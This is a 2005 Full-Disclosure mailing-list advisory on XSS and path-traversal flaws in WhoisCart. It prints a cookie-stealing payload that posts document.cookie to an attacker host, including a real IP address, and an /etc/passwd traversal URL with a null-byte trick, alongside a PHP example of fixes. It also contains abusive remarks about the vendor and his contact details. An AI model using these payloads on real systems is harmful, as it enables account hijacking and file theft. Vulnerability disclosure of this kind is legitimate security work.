[Full-disclosure] Multiple Vulnerabilities in Saeven.net's WhoisCart software.
- To: full-disclosure@xxxxxxxxxxxxxxxxx
- Subject: [Full-disclosure] Multiple Vulnerabilities in Saeven.net's WhoisCart software.
- From: "Elzar Stuffenbach" <sanisoft@xxxxxxxxxxxxx>
- Date: Thu, 23 Jun 2005 10:38:46 +0800
Subject:
Saeven.net's WhoisCart (all versions released prior to this disclosure) is vulnerable in that it allows an attacker to insert JavaScript into user-viewed pages, and also to view any world-readable file on the server hosting the WhoisCart software.
Severity:
Severe; these vulnerabilities can allow an attacker to access literally any part of a system, as plaintext database passwords can be read from the WhoisCart configuration, or users' session ID cookies can be stolen and used to access user accounts.
Preamble:
(Taken from http://www.whoiscart.net/)
Able to remember, and apt at making your life easier - Whois.Cart 2.2 is a hosting and domains shopping cart and billing management system that will most likely be your best friend during your domain hosting and registration business venture. Easily skinned using our versatile theme architecture, with support for over a dozen payment portals, fourteen different languages, and capable of all billing recurrences; the system is quickly becoming the most popular and highest rated script in its class [1]. Coded entirely in PHP, we challenge you to find a system faster than ours. Long-ranked in Zend's Top 10, and by far the most feature packed software for its price - come and see why exactly 3155 users just can't be wrong.
Problem:
The first vulnerability, involving JavaScript injection and ultimately session ID extraction, is exploited by utilizing an unsecured user input field:
http://yourdomain.com/whoiscart/profile.php?page=INSERT_JAVASCRIPT_HERE
Basically, URL-encode some JavaScript, like so:
<body onload=document.forms[0].submit(document.cookie)><form name=form1
action=http://yourmaliciousdomain.com/somescript></form></body>
turns into:
%3Cbody+onload%3Ddocument.forms%5B0%5D.submit%28document.cookie%29%3E%3Cform+name%3Dform1+action%3Dhttp%3A%2F%2F12.202.41.221%2F%7Evic%2Ftest.php%3E%3C%2Fform%3E%3C%2Fbody%3E
Then that URL-encoded JavaScript is inserted at the appropriate location in the URL above.
Next Problem:
The next vulnerability involves the plain-text printing of any world-readable file on the system (including any and all configuration files used to run WhoisCart, store session IDs, store plaintext database passwords, etc.):
http://yourdomain.com/whoiscart/?language=../../../../../../../../../../../../../etc/passwd%00
There you have the ability to read any world-readable file on the server. The %00 appends a null character, so as to avoid the script appending its own suffix and opening something like /etc/passwd.php instead.
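As an added example that is not WhoisCart's code, the following PHP shows how the two parameters described above (the language file selector and the echoed page parameter) can be handled so that neither traversal nor script injection is possible; the directory layout, language codes and function names are assumptions.

```php
<?php
// Added example, not WhoisCart's code. Directory, language codes and
// function names are assumptions made for illustration.

const LANGUAGE_DIR       = __DIR__ . '/lang';          // assumed layout
const ALLOWED_LANGUAGES  = ['en', 'fr', 'de', 'es'];   // assumed codes
const DEFAULT_LANGUAGE   = 'en';

// 1. ?language=... selects a translation file. The raw parameter must never
//    become part of a path; map it onto a fixed allowlist instead. An exact
//    match means "../../etc/passwd\0" or "en\0" can never be accepted, so
//    neither directory traversal nor null-byte truncation has anything to
//    work on. (PHP 5.3.4+ also refuses NUL bytes in include() paths, but
//    the allowlist is the real fix, not that side effect.)
function languageFile(string $requested): string
{
    $code = in_array($requested, ALLOWED_LANGUAGES, true)
        ? $requested
        : DEFAULT_LANGUAGE;
    return LANGUAGE_DIR . '/' . $code . '.php';
}

// 2. ?page=... is reflected into the HTML. Encode it on output so that
//    "<body onload=...>" is rendered as literal text rather than executed.
function safePageLabel(?string $page): string
{
    return htmlspecialchars($page ?? '', ENT_QUOTES | ENT_HTML5, 'UTF-8');
}

// Demo with constructed inputs mirroring the advisory's two payloads.
$traversal = "../../../../etc/passwd\0";
$xss       = '<body onload=document.forms[0].submit(document.cookie)>';

echo languageFile($traversal), "\n";   // falls back to .../lang/en.php
echo languageFile('fr'), "\n";         // .../lang/fr.php
echo safePageLabel($xss), "\n";        // &lt;body onload=...&gt;
```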
Workaround:
Use different software, not written by a 12 year old (no offense to any kids reading this, but think about security, for once). The vulnerabilities shown here are indicative of a truly inferior software product. The product is not even feature complete. The beta that's been in progress for 2 years, can be seen at http://beta.whoiscart.net/admin/, barely started. Vulnerabilities like this still exist, and have existed throughout the software since its inception. The only fix for this is for Saeven.net to release a new product, rewritten from the ground up, or for the consumer to choose a new product altogether (yes, there are better ones on the market for the same price, try Google). If a software allows the unauthorized viewing of globally readable files, the software has already failed, and deserves to be shot down such as this.
Vendor Contact:
saeven.net consulting
Alexandre Lemaire (registrations@xxxxxxxxxx)
1968 Portobello blvd
Orleans
Ontario,K4A 4E0
CA
Tel. +91.226370256 (If you call, careful you don't get his mom)
Disclosure Timeline:
Vendor Notified: June 21, 2005
Public Release: June 22, 2005
About the Author:
The author is a software engineer, with an absolute detest for bullshit. Sometimes I detest some languages, because they allow punks like this to write shit software, and then the dumbass programmer puts up a website, uses the word "innovative", and ends up ultimately screwing over a few hundred people, who maintain the personal information of thousands of people. Identity theft starts with "companies" such as this. Choose a trusted solution. The ability to crunch a few numbers, or execute a few lines of PHP, does NOT make something trustworthy. A company with a non-fictitious in-house lawyer is a good start, and then a company who knows what the fuck they're doing when it comes to software design and implementation is stellar.
It is this type of bullshit I detest, and I advise everyone against using this product, for numerous reasons, all founding from the same core element: a product is not to be trusted because of a flashy website, or because some kid lies about his age.
Conclusion:
Here is an email, verbatim from Mr. Lemaire:
<quote>
From: "S. Alexandre M. Lemaire" <saeven@xxxxxxxxxx>
I'll indulge your comments.
The truth is that I don't maintain the work on whois.cart currently. I
have a staff of 13 people working for me right now, the developments are
intense and I don't have the time to monitor them as I usually would. They
package and operate independently from myself. My user community knows well
(as I post frequent updates in the forums) that I'm currently vested into
our other project, our helpdesk. We have a user base of 3000+, you aren't
the only one to submit bug reports - note also that the people that work for
me, aren't bored teenagers. They are people with M.Scs and PhDs in computer
science and related fields, who've agreed to partake in the whois.cart
project on their spare time initially. Your concern for security, is not
exclusive.
</quote>
Show me a person with a Master's or PhD in Computer Science that both works in the webhosting software industry and writes shit software like this, and I will show you shit that smells like roses.
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/